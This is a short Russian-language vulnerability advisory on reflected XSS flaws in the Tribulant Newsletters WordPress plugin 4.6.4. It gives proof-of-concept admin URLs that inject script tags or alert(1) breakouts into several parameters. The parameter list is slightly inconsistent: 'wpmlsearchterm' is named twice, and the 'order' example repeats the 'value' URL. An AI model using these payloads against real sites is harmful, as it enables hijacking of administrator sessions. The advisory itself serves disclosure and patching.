В плагине Tribulant Newsletters версии 4.6.4 обнаружены множественные XSS уязвимости в параметрах «method», «id», «value», «order»,«wpmlsearchterm», «wpmlsearchterm». Межсайтовый скриптинг позволяет злоумышленнику внедрить произвольный код в эти параметры.

Tribulant Newsletter – это популярный плагин WordPress для рассылки новостей сайта, созданный компанией Tribulant Software. Эта компания специализируется на создание плагинов для WordPress.

Примеры эксплуатации уязвимостей:

В параметре «method»:

http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-subscribers&method=check-expired%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

В параметре «id»:

http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-lists&method=view&id=1%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

В параметре «value»:

http://vulnerablesite.com/wp-admin/admin-ajax.php?action=newsletters_gauge&value=1});alert(1);

В параметре «order»:

http://vulnerablesite.com/wp-admin/admin-ajax.php?action=newsletters_gauge&value=1});alert(1);

В параметре «wpmlsearchterm»:

http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-history&wpmlsearchterm=x%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

В параметре «wpmlmessage»:

http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-subscribers&wpmlupdated=true&wpmlmessage=%3Cscript%3Ealert%281%29%3C%2Fscript%3E

В версии 4.6.6 были исправлены эти уязвимости. Рекомендуется обновиться до последней версии этого плагина.

Использование Web Application Firewall позволяет блокировать подобные атаки.